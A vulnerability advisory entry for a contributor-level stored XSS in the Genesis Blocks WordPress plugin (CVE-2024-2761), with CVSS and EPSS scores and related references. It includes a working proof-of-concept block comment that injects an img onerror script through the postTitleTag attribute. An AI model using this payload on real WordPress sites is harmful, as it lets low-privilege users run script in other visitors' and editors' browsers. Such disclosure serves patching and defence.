Lucene search
Dmitrii IgnatyevWPEX-ID:E092CCDC-7EA1-4937-97B7-4CDBFF5E74E5HistoryMar 29, 2024 - 12:00 a.m.
Genesis Blocks < 3.1.3 - Contributor+ Stored XSS
2024-03-2900:00:00
Dmitrii Ignatyev
20
contributor
stored xss
code editor
previewing post
exploit
Description The plugin does not properly escape data input provided to some of its blocks, allowing using with at least contributor privileges to conduct Stored XSS attacks.
As a contributor, put the below code in a post while in Code Editor mode
<!-- wp:genesis-blocks/gb-post-grid {"postTitleTag":"img src=x onerror=alert(/XSS-postTitleTag/) style=width:150px;","readMoreText":"Continue Reading"} /-->
The XSS will be triggered when viewing/previewing the postReferences
Related
nvd
nvd
CVE-2024-2761
2024-04-19 05:15:49
cvelist
cvelist
CVE-2024-2761 Genesis Blocks < 3.1.3 - Contributor+ Stored XSS
2024-04-19 05:00:02
wpvulndb
wpvulndb
Genesis Blocks < 3.1.3 - Contributor+ Stored XSS
2024-03-29 00:00:00
cve
cve
CVE-2024-2761
2024-04-19 05:15:49
5.9 Medium
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.2%
Related for WPEX-ID:E092CCDC-7EA1-4937-97B7-4CDBFF5E74E5